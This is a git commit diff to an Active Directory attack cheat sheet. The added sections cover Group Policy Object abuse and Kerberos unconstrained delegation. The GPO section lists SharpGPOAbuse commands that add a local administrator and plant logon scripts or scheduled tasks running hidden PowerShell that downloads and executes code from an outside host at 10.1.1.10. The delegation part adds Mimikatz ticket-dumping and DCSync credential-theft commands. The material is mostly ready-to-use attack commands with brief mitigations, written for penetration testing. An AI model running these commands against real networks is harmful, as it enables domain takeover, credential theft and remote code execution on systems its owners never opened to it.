Kerberos AD GPO

This commit is contained in:
Swissky 2020-01-05 16:28:00 +01:00
parent b052f78d95
commit 73abdeed71

View file

@ -10,6 +10,7 @@
- [Open Shares](#open-shares) - [Open Shares](#open-shares)
- [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share) - [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share)
- [Passwords in SYSVOL & Group Policy Preferences](#passwords-in-sysvol-&-group-policy-preferences) - [Passwords in SYSVOL & Group Policy Preferences](#passwords-in-sysvol-&-group-policy-preferences)
- [Exploit Group Policy Objects GPO](#exploit-group-policy-objects-gpo)
- [Dumping AD Domain Credentials](#dumping-ad-domain-credentials) - [Dumping AD Domain Credentials](#dumping-ad-domain-credentials)
- [Using ndtsutil](#using-ndtsutil) - [Using ndtsutil](#using-ndtsutil)
- [Using Vshadow](#using-vshadow) - [Using Vshadow](#using-vshadow)
@ -47,13 +48,13 @@
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces) - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
- [Trust relationship between domains](#trust-relationship-between-domains) - [Trust relationship between domains](#trust-relationship-between-domains)
- [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking) - [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
- [Unconstrained delegation](#unconstrained-delegation) - [Kerberos Unconstrained Delegation](#kerberos-unconstrained-delegation)
- [Find delegation](#find-delegation) - [Find delegation](#find-delegation)
- [Monitor with Rubeus](#monitor-with-rubeus) - [Monitor with Rubeus](#monitor-with-rubeus)
- [Force a connect back from the DC](#force-a-connect-back-from-the-dc) - [Force a connect back from the DC](#force-a-connect-back-from-the-dc)
- [Load the ticket](#load-the-ticket) - [Load the ticket](#load-the-ticket)
- [Mitigation](#mitigation) - [Mitigation](#mitigation)
- [Resource-Based Constrained Delegation](#resource-based-constrained-delegation) - [Kerberos Resource Based Constrained Delegation](#kerberos-resource-based-constrained-delegation)
- [Relay delegation with mitm6](#relay-delegation-with-mitm6) - [Relay delegation with mitm6](#relay-delegation-with-mitm6)
- [PrivExchange attack](#privexchange-attack) - [PrivExchange attack](#privexchange-attack)
- [PXE Boot image attack](#pxe-boot-image-attack) - [PXE Boot image attack](#pxe-boot-image-attack)
@ -389,6 +390,23 @@ Get-NetGPOGroup
* Delete existing GPP xml files in SYSVOL containing passwords. * Delete existing GPP xml files in SYSVOL containing passwords.
* Dont put passwords in files that are accessible by all authenticated users. * Dont put passwords in files that are accessible by all authenticated users.
### Exploit Group Policy Objects GPO
```powershell
# Adding User Rights
SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO"
# Adding a Local Admin
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"
# Configuring a User or Computer Logon Script
SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
# Configuring a Computer or User Immediate Task
SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
```
### Dumping AD Domain Credentials ### Dumping AD Domain Credentials
You will need the following files to extract the ntds : You will need the following files to extract the ntds :
@ -1011,6 +1029,12 @@ Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccount
Add-ObjectACL -TargetDistinguishedName "dc=dev,dc=testlab,dc=local" -PrincipalSamAccountName titi -Rights DCSync Add-ObjectACL -TargetDistinguishedName "dc=dev,dc=testlab,dc=local" -PrincipalSamAccountName titi -Rights DCSync
``` ```
Check ACL for an User with [ADACLScanner](https://github.com/canix1/ADACLScanner).
```powershell
ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtree -EffectiveRightsPrincipal User1 -Output HTML -Show
```
### Trust relationship between domains ### Trust relationship between domains
@ -1047,10 +1071,17 @@ Prerequisite:
kerberos::golden /user:Administrator /krbtgt:HASH_KRBTGT /domain:domain.local /sid:S-1-5-21-2941561648-383941485-1389968811 /sids:S-1-5-SID-SECOND-DOMAIN-519 /ptt kerberos::golden /user:Administrator /krbtgt:HASH_KRBTGT /domain:domain.local /sid:S-1-5-21-2941561648-383941485-1389968811 /sids:S-1-5-SID-SECOND-DOMAIN-519 /ptt
``` ```
### Unconstrained delegation ### Kerberos Unconstrained Delegation
> The user sends a TGS to access the service, along with their TGT, and then the service can use the users TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html > The user sends a TGS to access the service, along with their TGT, and then the service can use the users TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
Domain Compromise via DC Print Server and Unconstrained Delegation
Prerequisites:
- Object with Property "Trust this computer for delegation to any service (Kerberos only)"
- Must have ADS_UF_TRUSTED_FOR_DELEGATION
- Must not have ADS_UF_NOT_DELEGATED flag
#### Find delegation #### Find delegation
Check the `TrustedForDelegation` property. Check the `TrustedForDelegation` property.
@ -1097,7 +1128,9 @@ Extract the base64 TGT from Rubeus output and load it to our current session.
.\Rubeus.exe asktgs /ticket:<ticket base64> /ptt .\Rubeus.exe asktgs /ticket:<ticket base64> /ptt
``` ```
Then you can use DCsync or another attack : `Mimikatz> lsadump::dcsync /user:HACKER\krbtgt` Alternatively you could also grab the ticket using Mimikatz : `mimikatz # sekurlsa::tickets`
Then you can use DCsync or another attack : `mimikatz # lsadump::dcsync /user:HACKER\krbtgt`
#### Mitigation #### Mitigation
@ -1105,7 +1138,7 @@ Then you can use DCsync or another attack : `Mimikatz> lsadump::dcsync /user:HAC
* Ensure sensitive accounts cannot be delegated * Ensure sensitive accounts cannot be delegated
* Disable the Print Spooler Service * Disable the Print Spooler Service
### Resource-Based Constrained Delegation ### Kerberos Resource Based Constrained Delegation
Resource-based Constrained Delegation was introduced in Windows Server 2012. Resource-based Constrained Delegation was introduced in Windows Server 2012.
@ -1469,4 +1502,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c5
* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic) * [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic)
* [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous](https:/www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/) * [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous](https:/www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/)
* [SMB Share SCF File Attacks - December 13, 2017 - @netbiosX](pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/) * [SMB Share SCF File Attacks - December 13, 2017 - @netbiosX](pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/)
* [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/) * [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
* [A Red Teamers Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179)